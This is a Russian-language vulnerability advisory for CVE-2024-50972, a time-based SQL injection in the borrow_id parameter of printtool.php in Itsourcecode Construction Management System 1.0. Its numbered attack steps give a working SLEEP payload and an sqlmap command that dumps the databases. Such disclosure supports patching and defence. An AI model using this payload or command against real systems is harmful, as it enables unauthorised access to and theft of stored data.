CVE-2024-50972
Описание
Уязвимость SQL-инъекции в файле printtool.php системы управления строительством Itsourcecode Construction Management System 1.0 позволяет удаленным злоумышленникам выполнять произвольные SQL-команды через параметр borrow_id.
Тип уязвимости
SQL-инъекция
Производитель продукта
Itsourcecode
База кода затронутого продукта:
https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/ - 1.0
Затронутый компонент:
Система управления строительством Itsourcecode Construction Management System v1.0 уязвима для SQL-инъекции через параметр borrow_id на странице printtool.php
Векторы атаки:
- Установите приложение локально и войдите с учетными данными администратора admin:admin
- Перейдите по следующему URL-адресу в вашем браузере:
http://localhost/monitoring_system/printtool.php?borrow_id=5
- Внедрите SQL-полезную нагрузку:
Измените параметр borrow_id в URL-адресе, включив в него временную SQL-инъекцию.
http://localhost/monitoring_system/printtool.php?borrow_id=5'+AND+(SELECT+7254+FROM+(SELECT(SLEEP(20)))rcGT)--+xxQB
- Наблюдайте за ответом приложения:
Страница должна загружаться заметно дольше (20 секунд), если инъекция успешна, что подтверждает уязвимость параметра borrow_id к SQL-инъекции.
- Теперь используйте инструмент SQLMap для дальнейшей эксплуатации и дампа баз данных с помощью следующей команды:
sqlmap.py -u http://localhost/monitoring_system/printtool.php?borrow_id=5 --risk 3 --level 3 --cookie="PHPSESSID=your_cookie_here" --dbs --technique=T --dump --no-cast
Ссылки:
- https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/
- https://owasp.org/www-community/attacks/SQL_Injection